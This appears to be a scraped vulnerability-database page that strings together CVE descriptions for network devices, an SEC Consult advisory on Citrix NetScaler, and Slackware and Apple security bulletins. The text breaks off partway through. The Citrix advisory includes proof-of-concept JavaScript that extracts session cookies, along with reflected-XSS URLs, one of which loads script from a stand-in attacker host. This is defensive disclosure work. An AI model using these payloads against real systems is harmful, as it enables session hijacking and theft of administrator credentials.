VARIoT IoT vulnerabilities database

Buffer overflow in ACME micro_httpd, as used in D-Link DSL2750U and DSL2740U and NetGear WGR614 and MR-ADSL-DG834 routers allows remote attackers to cause a denial of service (crash) via a long string in the URI in a GET request. ACME micro_httpd is a lightweight http server. Attackers can exploit this issue to crash the application, resulting in a denial-of-service conditions. micro_httpd June 2012 is vulnerable; other versions may also be affected. Both D-Link DSL2750U and DSL2740U are router products of D-Link. Both NetGear WGR614 and MR-ADSL-DG834 are router products of NetGear

Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Customer Voice Portal (CVP) allow remote attackers to inject arbitrary web script or HTML via a crafted parameter, aka Bug IDs CSCuh61711, CSCuh61720, CSCuh61723, CSCuh61726, CSCuh61727, CSCuh61731, and CSCuh61733. Vendors have confirmed this vulnerability Bug ID CSCuh61711 , CSCuh61720 , CSCuh61723 , CSCuh61726 , CSCuh61727 , CSCuh61731 ,and CSCuh61733 It is released as.Via a crafted parameter by a third party, any Web Script or HTML May be inserted. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. These issues are being tracked by Cisco Bug IDs CSCuh61711, CSCuh61720, CSCuh61723, CSCuh61726, CSCuh61727, CSCuh61731, and CSCuh61733

Multiple open redirect vulnerabilities in the admin web interface in the web framework in Cisco Unified Communications Domain Manager (CDM) 8.1(.4) and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via crafted URLs for unspecified scripts, aka Bug ID CSCuo48835. Vendors have confirmed this vulnerability Bug ID CSCuo48835 It is released as. Supplementary information : CWE Vulnerability type by CWE-601: URL Redirection to Untrusted Site ( Open redirect ) Has been identified. http://cwe.mitre.org/data/definitions/601.htmlSkillfully crafted unspecified script by a third party URL Any user through Web You may be redirected to a site and run a phishing attack. An attacker can leverage this issue to conduct phishing attacks; other attacks are possible. This component features scalable, distributed, and highly available enterprise Voice over IP call processing

The Accounts tab in the administrative user interface in McAfee Web Gateway (MWG) before 7.3.2.9 and 7.4.x before 7.4.2 allows remote authenticated users to obtain the hashed user passwords via unspecified vectors. McAfee Web Gateway is prone to a remote information-disclosure vulnerability. Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks. The product provides features such as threat protection, application control, and data loss prevention. A remote attacker could exploit this vulnerability to obtain a user's password hash

The web server on Cisco DPC3010, DPC3212, DPC3825, DPC3925, DPQ3925, EPC3010, EPC3212, EPC3825, and EPC3925 Wireless Residential Gateway products allows remote attackers to execute arbitrary code via a crafted HTTP request, aka Bug ID CSCup40808. The Cisco Wireless Residential Gateway is the device for the associated wireless home gateway. Attackers can exploit this issue to inject arbitrary commands and execute arbitrary code with elevated privileges. Failed exploit attempts will crash the web server, denying service to legitimate users. This issue is being tracked by Cisco bug ID CSCup40808. Cisco DPC3010, etc. The following products are affected: Cisco DPC3010, DPC3212, DPC3825, DPC3925, DPQ3925, EPC3010, EPC3212, EPC3825, EPC3925

D-Link DNS-320 Ax is a NAS network storage product from D-Link. A remote command injection vulnerability exists in D-Link DNS-320 Ax running firmware version 2.04b02 and earlier. An attacker could use this vulnerability to execute arbitrary commands in the context of an affected device with root privileges. It may also cause a denial of service. D-Link DNS-320 Ax is prone to an unspecified remote command-injection vulnerability. Failed exploit attempts will likely result in denial-of-service conditions

The DNR-322L and DNR-326 network video memory is a stand-alone storage device that supports M-JPEG, MPEG4 or H.264 encoding formats. D-Link DNR-322L and DNR-326 are NAS network storage products of D-Link Corporation. D-Link DNR-322L and DNR-326 have authentication bypass loopholes, information disclosure loopholes, arbitrary firmware upload loopholes, and denial of service loopholes. Attackers can use these vulnerabilities to perform unauthorized operations, upload arbitrary firmware, cause denial of service, or disclose sensitive information. D-Link DNR-322L and DNR-326 are prone to an authentication-bypass vulnerability, multiple information-disclosure vulnerabilities, an arbitrary firmware-upload vulnerability, and a denial-of-service vulnerability. This may aid in further attacks

Directory traversal vulnerability in Cisco Unified Contact Center Enterprise allows remote authenticated users to read arbitrary web-root files via a crafted URL, aka Bug ID CSCun25262. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. This issue is being tracked by Cisco BugId CSCun25262

upAdminPg.asp in Advantech WebAccess before 7.2 allows remote authenticated users to discover credentials by reading HTML source code. This vulnerability allows remote attackers to disclose arbitrary credentials on vulnerable versions of Advantech WebAccess. Authentication is required to exploit this vulnerability. The specific flaw exists within the upAdminPg.asp component. An authenticated user can provide an arbitrary existing account name to this page and receive the account password. An attacker can leverage this vulnerability to then authenticate as the WebAccess Administrator. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess has a password disclosure vulnerability, and its upAdminPg.asp component contains passwords for specific accounts, allowing attackers to exploit vulnerabilities to obtain sensitive information. Advantech WebAccess is prone to a remote information-disclosure vulnerability. This may aid in further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There are security holes in the upAdminPg.asp script of Advantech WebAccess 7.1 and earlier versions

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2014-2886, CVE-2014-2942. Reason: this ID was intended for one issue, but was assigned to two issues by a CNA. Notes: All CVE users should consult CVE-2014-2886 and CVE-2014-2942 to determine which ID is appropriate. All references and descriptions in this candidate have been removed to prevent accidental usage. Cobham Sailor 6000 series satellite terminals contain hardcoded credentials for communicating via the Tbus 2 protocol. ** Delete ** This case CVE-2014-2942 It was removed because it was found to be duplicated.By calculating the code of the superuser, the attacker gains a privileged terminal session, and as a result, PIN Physical or terminal access may be used to enter the code

Cisco IOS XR 4.3.4 and earlier on ASR 9000 devices, when bridge-group virtual interface (BVI) routing is enabled, allows remote attackers to cause a denial of service (chip and card hangs) via a series of crafted MPLS packets, aka Bug ID CSCuo91149. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. A denial of service vulnerability exists in Cisco IOS XR Software MPLS packet processing, allowing an attacker to exploit a vulnerability to initiate a denial of service attack. Cisco IOS XR is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the affected device to crash, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCuo91149

Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) before 9.3-62.4 and 10.x before 10.1-126.12 allows attackers to obtain sensitive information via vectors related to a cookie. Citrix NetScaler Application Delivery Controller is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20140716-2 > ======================================================================= title: Multiple vulnerabilities product: Citrix NetScaler Application Delivery Controller Citrix NetScaler Gateway vulnerable version: <9.3-62.4 <10.1-126.12 fixed version: >=9.3-62.4 >=10.1-126.12 CVE: CVE-2014-4346, CVE-2014-4347 impact: High homepage: http://www.citrix.com found: 2014-01-05 by: Stefan Viehb\xf6ck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: - ----------------------------- "Citrix NetScaler helps organizations build enterprise cloud networks that embody the characteristics and capabilities that define public cloud services, such as elasticity, expandability and simplicity. NetScaler brings to enterprise IT leaders multiple advanced technologies that were previously available only to large public cloud providers." "As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services. They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection. Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform." URL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html Business recommendation: - ------------------------ Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure to execute administrative actions. Affected Systems should be updated as soon as possible. Vulnerability overview/description: - ----------------------------------- 1) Cookie disclosure The error handler in the Apache g_soap module prints all of the request header information including the HTTP Cookie field. 2) Reflected Cross-Site Scripting (XSS) Citrix Netscaler suffers from multiple reflected Cross-Site Scripting vulnerabilities, which allow an attacker to steal user information, impersonate users and perform administrative actions on the appliance. There are many parameters which are not properly sanitized and thus vulnerable to XSS. Proof of concept: - ----------------- 1) Cookie disclosure A GET request to the SOAP handler returns the following information: GET /soap HTTP/1.1 Host: <host> *OTHER HEADER FIELDS* Response: HTTP/1.1 200 OK ... Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> ... <BODY> <H1>mod_gsoap Apache SOAP Server Error</H1> <p><strong>No body received</strong> ... <br>Cookie: SESSID=*SESSION ID*; ... In combination with an XSS vulnerability (see 2) an attacker can use the following code to extract cookies including the SESSID cookie of an administrator: var request = new XMLHttpRequest(); request.open('GET', '/soap', false); request.send(); lines=request.responseText.split('<br>') for (var i in lines){ if (lines[i].indexOf('Cookie')==0){ alert(lines[i]); break; } } 2) Reflected Cross-Site Scripting Accessing the following URL will include the Javascript code from http://evilattacker/evil.js: http://<host>/menu/topn?name=";<%2fscript><script+src%3d"http:%2f%2fevilattacker%2fevil.js"><%2fscript> Other pages do not sanitize user input properly as well: http://<host>/pcidss/launch_report?type=AA";alert('xss');x=" http://<host>/menu/guiw?nsbrand=AA<"'>AA&protocol=BB<"'>BB&id=CC<"'>CC Note: Content-Type is application/x-java-jnlp-file, so the injected script code is not interpreted. However, it is possible to inject arguments into a Java JNLP file, which might be used in further attacks. Vulnerable / tested versions: - ----------------------------- The vulnerabilities have been verified to exist in Citrix NetScaler VPX 10.0, which was the most recent version at the time of discovery. According to the vendor versions before 10.1-126.12 and 9.3-62.4 are vulnerable Vendor contact timeline: - ------------------------ 2014-01-09: Sending advisory and proof of concept exploit via encrypted channel. 2014-01-17: Vendor acknowledges receipt of advisory. 2014-04-04: Requesting status update. 2014-06-10: Vendor is "in the process of scheduling the release of a security bulletin". 2014-07-07: Requesting list of affected/non-affected versions CVE-IDs. 2014-07-07: Vendors is "still in the final stages of releasing the bulletin". 2014-07-07: Requesting info about cause of delay. 2014-07-07: Vendor is "still hopeful that the bulletin will be available soon". 2014-07-14: Vendor states that fixed version will be available on July 15/16. 2014-07-16: SEC Consult releases coordinated security advisory. Solution: - --------- Update to a more recent version of Citrix NetScaler. More information can be found at: https://support.citrix.com/article/ctx140863 Workaround: - ----------- No workaround available. Advisory URL: - ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested in working with the experts of SEC Consult? Write to career@sec-consult.com EOF Stefan Viehb\xf6ck / @2014 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQEcBAEBAgAGBQJTxmWgAAoJECyFJyAEdlkKWLYH/0wpELCJemzmkj2HaotFZJtt 4C4/hsHWGbxmi2VbeiwGvYKHtDsw2KBDWlTrVTef3UrBnbAv6jFncTCjOv3eU6Ze 9swUmwxzNB9zqGvhYwEpcO8tSQu0H3xDMvbpKqYvq2qaBSm4YmJyUrDlwwSkCUnq ycGqzfidkAXoMUu/6wdam5251zXcR33n1KRfr3AH65p/OoOXrvasgY395Cty9zqW yfBvEIEs845aE/gbjbp40qvroz1dG8Z2LP4ykFWywVme0imgSD6nv/33Z0tDmlcD f7JjK8F7R7Q8l4J54n0iclXCWZhoS3pfabd60NXMzMmxroMuksmiNycm7yLGfe4= =KicK -----END PGP SIGNATURE-----

Unrestricted file upload vulnerability in Aruba Web Management portal allows remote attackers to execute arbitrary code by uploading a file with an executable extension. Aruba Web Management portal Contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Aruba Networks is a provider of enterprise 802.11 (Wi-Fi) wireless networking products and security system services. Web Management Portal 6.3.0.60730 is vulnerable; other versions may also be affected

The ChkCookie subroutine in an ActiveX control in broadweb/include/gChkCook.asp in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a crafted call. This vulnerability allows remote attackers to bypass authentication requirements on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ChkCookieNoRedir function. By providing arbitrary values to certain fields, an attacker can receive a session authentication cookie despite receiving an error message. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. If you set user, proj, and scada are set and bwuser is true, you can access multiple restricted pages. This may aid in further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment

The mod_proxy module in the Apache HTTP Server 2.4.x before 2.4.10, when a reverse proxy is enabled, allows remote attackers to cause a denial of service (child-process crash) via a crafted HTTP Connection header. Authentication is not required to exploit this vulnerability.The specific flaw exists within the mod_proxy module. The issue lies in the processing of HTTP headers when an invalid request is made. Successful exploits may allow an attacker to cause an affected application to crash, resulting in a denial-of-service condition. mod_proxy is one of the proxy modules. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/httpd-2.4.10-i486-1_slack14.1.txz: Upgraded. See directives DeflateInflateLimitRequestBody, DeflateInflateRatioLimit, and DeflateInflateRatioBurst. [Joe Orton, Eric Covener] *) SECURITY: CVE-2014-0231 (cve.mitre.org) mod_cgid: Fix a denial of service against CGI scripts that do not consume stdin that could lead to lingering HTTPD child processes filling up the scoreboard and eventually hanging the server. By default, the client I/O timeout (Timeout directive) now applies to communication with scripts. The CGIDScriptTimeout directive can be used to set a different timeout for communication with scripts. [Rainer Jung, Eric Covener, Yann Ylavic] For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0117 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231 (* Security fix *) +--------------------------+ Where to find the new packages: +-----------------------------+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.27-i486-1_slack13.0.txz Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.27-x86_64-1_slack13.0.txz Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.27-i486-1_slack13.1.txz Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.27-x86_64-1_slack13.1.txz Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.27-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.27-x86_64-1_slack13.37.txz Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.10-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.10-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.10-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.10-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.10-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.10-x86_64-1.txz MD5 signatures: +-------------+ Slackware 13.0 package: c79e696c379625efd18e6414f30dba80 httpd-2.2.27-i486-1_slack13.0.txz Slackware x86_64 13.0 package: 28be181b3a0aae494371279230f190e9 httpd-2.2.27-x86_64-1_slack13.0.txz Slackware 13.1 package: fc409fff4d79cb1969a40756f8a9f576 httpd-2.2.27-i486-1_slack13.1.txz Slackware x86_64 13.1 package: 07ab0f3337fc15656cd2e841c9b0eba4 httpd-2.2.27-x86_64-1_slack13.1.txz Slackware 13.37 package: b5cefd8903745aceaa68b482cb63e4e2 httpd-2.2.27-i486-1_slack13.37.txz Slackware x86_64 13.37 package: 610a33703e7f84fd14f09bc9529c1cd5 httpd-2.2.27-x86_64-1_slack13.37.txz Slackware 14.0 package: d6dedc1064a6a4d039b188fed02de89b httpd-2.4.10-i486-1_slack14.0.txz Slackware x86_64 14.0 package: 7d150bf3bd558bf70ea2c21a08a1b5b7 httpd-2.4.10-x86_64-1_slack14.0.txz Slackware 14.1 package: 7e9b03930b0452a95595a61cf1b093d8 httpd-2.4.10-i486-1_slack14.1.txz Slackware x86_64 14.1 package: efc9893a3428d87a8d78787fbde793e0 httpd-2.4.10-x86_64-1_slack14.1.txz Slackware -current package: 1ac5a4cc6275c8f7cfa6e3a77a27f2db n/httpd-2.4.10-i486-1.txz Slackware x86_64 -current package: 7fa5fda601a324238f5a2768204a7476 n/httpd-2.4.10-x86_64-1.txz Installation instructions: +------------------------+ Upgrade the package as root: # upgradepkg httpd-2.4.10-i486-1_slack14.1.txz Then, restart Apache httpd: # /etc/rc.d/rc.httpd stop # /etc/rc.d/rc.httpd start +-----+ Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com +------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004 OS X Yosemite 10.10.3 and Security Update 2015-004 are now available and address the following: Admin Framework Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A process may gain admin privileges without properly authenticating Description: An issue existed when checking XPC entitlements. This issue was addressed with improved entitlement checking. CVE-ID CVE-2015-1130 : Emil Kvarnhammar at TrueSec apache Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in Apache Description: Multiple vulnerabilities existed in Apache versions prior to 2.4.10 and 2.2.29, including one that may allow a remote attacker to execute arbitrary code. These issues were addressed by updating Apache to versions 2.4.10 and 2.2.29 CVE-ID CVE-2013-0118 CVE-2013-5704 CVE-2013-6438 CVE-2014-0098 CVE-2014-0117 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-3523 ATS Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: Multiple input validation issues existed in fontd. These issues were addressed through improved input validation. CVE-ID CVE-2015-1131 : Ian Beer of Google Project Zero CVE-2015-1132 : Ian Beer of Google Project Zero CVE-2015-1133 : Ian Beer of Google Project Zero CVE-2015-1134 : Ian Beer of Google Project Zero CVE-2015-1135 : Ian Beer of Google Project Zero Certificate Trust Policy Impact: Update to the certificate trust policy Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858. CFNetwork HTTPProtocol Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Cookies belonging to one origin may be sent to another origin Description: A cross-domain cookie issue existed in redirect handling. Cookies set in a redirect response could be passed on to a redirect target belonging to another origin. The issue was address through improved handling of redirects. CVE-ID CVE-2015-1089 : Niklas Keller CFNetwork Session Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Authentication credentials may be sent to a server on another origin Description: A cross-domain HTTP request headers issue existed in redirect handling. The issue was addressed through improved handling of redirects. CVE-ID CVE-2015-1091 : Diego Torres (http://dtorres.me) CFURL Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation. CVE-ID CVE-2015-1088 : Luigi Galli CoreAnimation Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A use-after-free issue existed in CoreAnimation. This issue was addressed through improved mutex management. CVE-ID CVE-2015-1136 : Apple FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-1093 : Marc Schoenefeld Graphics Driver Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A NULL pointer dereference existed in NVIDIA graphics driver's handling of certain IOService userclient types. This issue was addressed through additional context validation. CVE-ID CVE-2015-1137 : Frank Graziano and John Villamil of the Yahoo Pentest Team Hypervisor Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local application may be able to cause a denial of service Description: An input validation issue existed in the hypervisor framework. This issue was addressed through improved input validation. CVE-ID CVE-2015-1138 : Izik Eidus and Alex Fishman ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted .sgi file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of .sgi files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1139 : Apple IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A malicious HID device may be able to cause arbitrary code execution Description: A memory corruption issue existed in an IOHIDFamily API. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1095 : Andrew Church IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1140 : lokihardt@ASRT working with HP's Zero Day Initiative, Luca Todesco IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to determine kernel memory layout Description: An issue existed in IOHIDFamily that led to the disclosure of kernel memory content. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1096 : Ilja van Sprundel of IOActive IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A heap buffer overflow existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4404 : Ian Beer of Google Project Zero IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A null pointer dereference existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved validation of IOHIDFamily key-mapping properties. CVE-ID CVE-2014-4405 : Ian Beer of Google Project Zero IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A user may be able to execute arbitrary code with system privileges Description: An out-of-bounds write issue exited in the IOHIDFamily driver. The issue was addressed through improved input validation. CVE-ID CVE-2014-4380 : cunzhang from Adlab of Venustech Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system shutdown Description: An issue existed in the handling of virtual memory operations within the kernel. The issue is fixed through improved handling of the mach_vm_read operation. CVE-ID CVE-2015-1141 : Ole Andre Vadla Ravnas of www.frida.re Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause a system denial of service Description: A race condition existed in the kernel's setreuid system call. This issue was addressed through improved state management. CVE-ID CVE-2015-1099 : Mark Mentovai of Google Inc. Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local application may escalate privileges using a compromised service intended to run with reduced privileges Description: setreuid and setregid system calls failed to drop privileges permanently. This issue was addressed by correctly dropping privileges. CVE-ID CVE-2015-1117 : Mark Mentovai of Google Inc. Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to redirect user traffic to arbitrary hosts Description: ICMP redirects were enabled by default on OS X. This issue was addressed by disabling ICMP redirects. CVE-ID CVE-2015-1103 : Zimperium Mobile Security Labs Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to cause a denial of service Description: A state inconsistency existed in the processing of TCP headers. This issue was addressed through improved state handling. CVE-ID CVE-2015-1102 : Andrey Khudyakov and Maxim Zhuravlev of Kaspersky Lab Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A out of bounds memory access issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1100 : Maxime Villard of m00nbsd Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to bypass network filters Description: The system would treat some IPv6 packets from remote network interfaces as local packets. The issue was addressed by rejecting these packets. CVE-ID CVE-2015-1104 : Stephen Roettger of the Google Security Team Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1101 : lokihardt@ASRT working with HP's Zero Day Initiative Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to cause a denial of service Description: A state inconsistency issue existed in the handling of TCP out of band data. This issue was addressed through improved state management. CVE-ID CVE-2015-1105 : Kenton Varda of Sandstorm.io LaunchServices Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause the Finder to crash Description: An input validation issue existed in LaunchServices's handling of application localization data. This issue was addressed through improved validation of localization data. CVE-ID CVE-2015-1142 LaunchServices Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A type confusion issue existed in LaunchServices's handling of localized strings. This issue was addressed through additional bounds checking. CVE-ID CVE-2015-1143 : Apple libnetcore Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted configuration profile may lead to unexpected application termination Description: A memory corruption issue existed in the handling of configuration profiles. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1118 : Zhaofeng Chen, Hui Xue, Yulong Zhang, and Tao Wei of FireEye, Inc. ntp Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may brute force ntpd authentication keys Description: The config_auth function in ntpd generated a weak key when an authentication key was not configured. This issue was addressed by improved key generation. CVE-ID CVE-2014-9298 OpenLDAP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote unauthenticated client may be able to cause a denial of service Description: Multiple input validation issues existed in OpenLDAP. These issues were addressed by improved input validation. CVE-ID CVE-2015-1545 : Ryan Tandy CVE-2015-1546 : Ryan Tandy OpenSSL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in OpenSSL Description: Multiple vulnerabilities existed in OpenSSL 0.9.8zc, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers. These issues were addressed by updating OpenSSL to version 0.9.8zd. CVE-ID CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 Open Directory Client Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A password might be sent unencrypted over the network when using Open Directory from OS X Server Description: If an Open Directory client was bound to an OS X Server but did not install the certificates of the OS X Server, and then a user on that client changed their password, the password change request was sent over the network without encryption. This issue was addressed by having the client require encryption for this case. CVE-ID CVE-2015-1147 : Apple PHP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.3.29, 5.4.38, and 5.5.20, including one which may have led to arbitrary code execution. This update addresses the issues by updating PHP to versions 5.3.29, 5.4.38, and 5.5.20. CVE-ID CVE-2013-6712 CVE-2014-0207 CVE-2014-0237 CVE-2014-0238 CVE-2014-2497 CVE-2014-3478 CVE-2014-3479 CVE-2014-3480 CVE-2014-3487 CVE-2014-3538 CVE-2014-3587 CVE-2014-3597 CVE-2014-3668 CVE-2014-3669 CVE-2014-3670 CVE-2014-3710 CVE-2014-3981 CVE-2014-4049 CVE-2014-4670 CVE-2014-4698 CVE-2014-5120 QuickLook Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Opening a maliciously 